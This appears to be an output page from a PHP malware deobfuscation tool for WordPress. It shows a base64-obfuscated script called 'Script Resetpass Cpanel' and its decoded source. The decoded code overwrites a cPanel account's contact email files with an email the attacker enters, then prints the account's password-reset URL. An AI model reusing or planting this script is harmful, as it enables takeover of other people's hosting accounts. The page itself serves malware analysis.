Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php ############################ ##Script Resetpass Cpanel ## ##Coded By Naufal Ardhani ## ## www.naufalardhani.com ## ############################ $code = 'IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyNTY3JpcHQgUmVzZXRwYXNzIENwYW5lbCAjIw0KIyNDb2RlZCBCeSBOYXVmYWwgQXJkaGFuaSAjIw0KIyMgd3d3Lm5hdWZhbGFyZGhhbmkuY29tICAjIw0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KZWNobyAnPGh0bWw+DQogICAgPGhlYWQ+IA0KICAgIDxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cHM6Ly9jZG4ua3VhbG8uY29tL3dlYnNpdGUvaWNvbl9jcGFuZWwucG5nIj4NCiAgICANCgkgICAgICA8dGl0bGU+UmVzZXQgUGFzc3dvcmQgQ3BhbmVsICA8L3RpdGxlPg0KCSAgICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPGJvZHkgYmdjb2xvcj0jMzdhNjliPg0KPC9ib2R5Pg0KPHN0eWxlPg0KaW5wdXRbdHlwZT0iZW1haWwiXSB7DQogIGJvcmRlcjogMXB4IHNvbGlkICNkZGQ7DQogIHBhZGRpbmc6IDRweCA4cHg7DQp9DQoNCmlucHV0W3R5cGU9ImVtYWlsIl06Zm9jdXMgew0KICBib3JkZXI6IDFweCBzb2xpZCAjMDAwOw0KfQ0KDQppbnB1dFt0eXBlPSJzdWJtaXQiXSB7DQogIGZvbnQtd2VpZ2h0OiBib2xkOw0KICBwYWRkaW5nOiA0cHggOHB4Ow0KICBib3JkZXI6MXB4IHNvbGlkICMwMDA7DQogIGJhY2tncm91bmQ6ICMzYjU5OTg7DQogIGNvbG9yOiNmZmY7DQp9DQo8L3N0eWxlPg0KICAgICAgCTwvaGVhZD4NCiAgICAgPGJvZHk+DQoJIDwhLS1TQ0MgLS0+DQogICAgICAgPGNlbnRlcj4gCQ0KICAgICAgIDxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxmb250IGNvbG9yPSJ3aGl0ZSIgc2l6ZT0iNSI+PGI+UmVzZXQgUGFzc3dvcmQgQ3BhbmVsPC9iPjwvZm9udD48YnI+PGJyPiANCgkgICA8ZGl2IHN0eWxlPSJib3JkZXItcmFkaXVzOiA2cHg7Ym9yZGVyOiAxcHggc29saWQgd2hpdGU7cGFkZGluZzogNHB4IDJweDt3aWR0aDogMjUlO2xpbmUtaGVpZ2h0OiAyNHB4O2JhY2tncm91bmQ6ICM0Y2JhYWU7Y29sb3I6d2hpdGU7Ij4NCgkgICA8YnI+DQoJPHA+ICAgDQoJICAgIDxmb3JtIGFjdGlvbj0iIyIgbWV0aG9kPSJwb3N0Ij4NCgkgICAgPGI+IEVtYWlsIDogPC9iPg0KCTxpbnB1dCB0eXBlPSJlbWFpbCIgbmFtZT0iZW1haWwiIHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOiB3aGl0ZTtmb250OiA5cHQgdGFob21hO2NvbG9yOndoaXRlOyIgLz4NCgk8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJzdWJtaXQiIHZhbHVlPSJTZW5kIiBzdHlsZT0ic3R5bGU9ImJvcmRlci1yYWRpdXM6IDZweDtmb250OiA5cHQgdGFob21hO2NvbG9yOndoaXRlOyIvPg0KCQ0KCTwvZm9ybT4NCgk8YnI+DQoJPC9wPg0KCTwvZGl2Pg0KCTxicj4NCgk8Zm9udCBjb2xvcj0id2hpdGUiIHNpemU9IjQiPkNvZGVkIGJ5IE5hdWZhbCBBcmRoYW5pIHwgQmxvZyA6IHd3dy5uYXVmYWxhcmRoYW5pLmNvbTwvZm9udD4NCiAgIDwvY2VudGVyPg0KICAgIDwvYm9keT4NCjwvaHRtbD4nOw0KDQokdXNlciA9IGdldF9jdXJyZW50X3VzZXIoKTsNCiRzaXRlID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOw0KJGlwcyA9IGdldGVudignUkVNT1RFX0FERFInKTsNCg0KaWYoaXNzZXQoJF9QT1NUWydzdWJtaXQnXSkpew0KCQ0KCSRlbWFpbCA9ICRfUE9TVFsnZW1haWwnXTsNCgkkd3IgPSAnZW1haWw6Jy4kZW1haWw7DQokZiA9IGZvcGVuKCcvaG9tZS8nLiR1c2VyLicvLmNwYW5lbC9jb250YWN0aW5mbycsICd3Jyk7DQpmd3JpdGUoJGYsICR3cik7IA0KZmNsb3NlKCRmKTsNCiRmID0gZm9wZW4oJy9ob21lLycuJHVzZXIuJy8uY29udGFjdGluZm8nLCAndycpOw0KZndyaXRlKCRmLCAkd3IpOyANCmZjbG9zZSgkZik7DQokcGFybSA9ICRzaXRlLic6MjA4My9yZXNldHBhc3M/c3RhcnQ9MSc7DQplY2hvICc8YnIvPjxjZW50ZXI+Jy4kcGFybS4nPC9jZW50ZXI+JzsNCn0='; //naufalardhani.com //hargai karya orang eval(base64_decode($code)); ?>
<?php
############################
##Script Resetpass Cpanel ##
##Coded By Naufal Ardhani ##
## www.naufalardhani.com ##
############################
$code = 'IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyNTY3JpcHQgUmVzZXRwYXNzIENwYW5lbCAjIw0KIyNDb2RlZCBCeSBOYXVmYWwgQXJkaGFuaSAjIw0KIyMgd3d3Lm5hdWZhbGFyZGhhbmkuY29tICAjIw0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KZWNobyAnPGh0bWw+DQogICAgPGhlYWQ+IA0KICAgIDxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cHM6Ly9jZG4ua3VhbG8uY29tL3dlYnNpdGUvaWNvbl9jcGFuZWwucG5nIj4NCiAgICANCgkgICAgICA8dGl0bGU+UmVzZXQgUGFzc3dvcmQgQ3BhbmVsICA8L3RpdGxlPg0KCSAgICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPGJvZHkgYmdjb2xvcj0jMzdhNjliPg0KPC9ib2R5Pg0KPHN0eWxlPg0KaW5wdXRbdHlwZT0iZW1haWwiXSB7DQogIGJvcmRlcjogMXB4IHNvbGlkICNkZGQ7DQogIHBhZGRpbmc6IDRweCA4cHg7DQp9DQoNCmlucHV0W3R5cGU9ImVtYWlsIl06Zm9jdXMgew0KICBib3JkZXI6IDFweCBzb2xpZCAjMDAwOw0KfQ0KDQppbnB1dFt0eXBlPSJzdWJtaXQiXSB7DQogIGZvbnQtd2VpZ2h0OiBib2xkOw0KICBwYWRkaW5nOiA0cHggOHB4Ow0KICBib3JkZXI6MXB4IHNvbGlkICMwMDA7DQogIGJhY2tncm91bmQ6ICMzYjU5OTg7DQogIGNvbG9yOiNmZmY7DQp9DQo8L3N0eWxlPg0KICAgICAgCTwvaGVhZD4NCiAgICAgPGJvZHk+DQoJIDwhLS1TQ0MgLS0+DQogICAgICAgPGNlbnRlcj4gCQ0KICAgICAgIDxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxmb250IGNvbG9yPSJ3aGl0ZSIgc2l6ZT0iNSI+PGI+UmVzZXQgUGFzc3dvcmQgQ3BhbmVsPC9iPjwvZm9udD48YnI+PGJyPiANCgkgICA8ZGl2IHN0eWxlPSJib3JkZXItcmFkaXVzOiA2cHg7Ym9yZGVyOiAxcHggc29saWQgd2hpdGU7cGFkZGluZzogNHB4IDJweDt3aWR0aDogMjUlO2xpbmUtaGVpZ2h0OiAyNHB4O2JhY2tncm91bmQ6ICM0Y2JhYWU7Y29sb3I6d2hpdGU7Ij4NCgkgICA8YnI+DQoJPHA+ICAgDQoJICAgIDxmb3JtIGFjdGlvbj0iIyIgbWV0aG9kPSJwb3N0Ij4NCgkgICAgPGI+IEVtYWlsIDogPC9iPg0KCTxpbnB1dCB0eXBlPSJlbWFpbCIgbmFtZT0iZW1haWwiIHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOiB3aGl0ZTtmb250OiA5cHQgdGFob21hO2NvbG9yOndoaXRlOyIgLz4NCgk8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJzdWJtaXQiIHZhbHVlPSJTZW5kIiBzdHlsZT0ic3R5bGU9ImJvcmRlci1yYWRpdXM6IDZweDtmb250OiA5cHQgdGFob21hO2NvbG9yOndoaXRlOyIvPg0KCQ0KCTwvZm9ybT4NCgk8YnI+DQoJPC9wPg0KCTwvZGl2Pg0KCTxicj4NCgk8Zm9udCBjb2xvcj0id2hpdGUiIHNpemU9IjQiPkNvZGVkIGJ5IE5hdWZhbCBBcmRoYW5pIHwgQmxvZyA6IHd3dy5uYXVmYWxhcmRoYW5pLmNvbTwvZm9udD4NCiAgIDwvY2VudGVyPg0KICAgIDwvYm9keT4NCjwvaHRtbD4nOw0KDQokdXNlciA9IGdldF9jdXJyZW50X3VzZXIoKTsNCiRzaXRlID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOw0KJGlwcyA9IGdldGVudignUkVNT1RFX0FERFInKTsNCg0KaWYoaXNzZXQoJF9QT1NUWydzdWJtaXQnXSkpew0KCQ0KCSRlbWFpbCA9ICRfUE9TVFsnZW1haWwnXTsNCgkkd3IgPSAnZW1haWw6Jy4kZW1haWw7DQokZiA9IGZvcGVuKCcvaG9tZS8nLiR1c2VyLicvLmNwYW5lbC9jb250YWN0aW5mbycsICd3Jyk7DQpmd3JpdGUoJGYsICR3cik7IA0KZmNsb3NlKCRmKTsNCiRmID0gZm9wZW4oJy9ob21lLycuJHVzZXIuJy8uY29udGFjdGluZm8nLCAndycpOw0KZndyaXRlKCRmLCAkd3IpOyANCmZjbG9zZSgkZik7DQokcGFybSA9ICRzaXRlLic6MjA4My9yZXNldHBhc3M/c3RhcnQ9MSc7DQplY2hvICc8YnIvPjxjZW50ZXI+Jy4kcGFybS4nPC9jZW50ZXI+JzsNCn0=';
eval {
############################
##Script Resetpass Cpanel ##
##Coded By Naufal Ardhani ##
## www.naufalardhani.com ##
############################
echo '<html>
<head>
<link rel="shortcut icon" href="https://cdn.kualo.com/website/icon_cpanel.png">
<title>Reset Password Cpanel </title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<body bgcolor=#37a69b>
</body>
<style>
input[type="email"] {
border: 1px solid #ddd;
padding: 4px 8px;
}
input[type="email"]:focus {
border: 1px solid #000;
}
input[type="submit"] {
font-weight: bold;
padding: 4px 8px;
border:1px solid #000;
background: #3b5998;
color:#fff;
}
</style>
</head>
<body>
<!--SCC -->
<center>
<br><br><br><br><br><br><br><br><br><br><br><br><font color="white" size="5"><b>Reset Password Cpanel</b></font><br><br>
<div style="border-radius: 6px;border: 1px solid white;padding: 4px 2px;width: 25%;line-height: 24px;background: #4cbaae;color:white;">
<br>
<p>
<form action="#" method="post">
<b> Email : </b>
<input type="email" name="email" style="background-color: white;font: 9pt tahoma;color:white;" />
<input type="submit" name="submit" value="Send" style="style="border-radius: 6px;font: 9pt tahoma;color:white;"/>
</form>
<br>
</p>
</div>
<br>
<font color="white" size="4">Coded by Naufal Ardhani | Blog : www.naufalardhani.com</font>
</center>
</body>
</html>';
$user = get_current_user();
$site = $_SERVER['HTTP_HOST'];
$ips = getenv('REMOTE_ADDR');
if (isset($_POST['submit'])) {
$email = $_POST['email'];
$wr = 'email:' . $email;
$f = fopen('/home/' . $user . '/.cpanel/contactinfo', 'w');
fwrite($f, $wr);
fclose($f);
$f = fopen('/home/' . $user . '/.contactinfo', 'w');
fwrite($f, $wr);
fclose($f);
$parm = $site . ':2083/resetpass?start=1';
echo '<br/><center>' . $parm . '</center>';
}
};Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.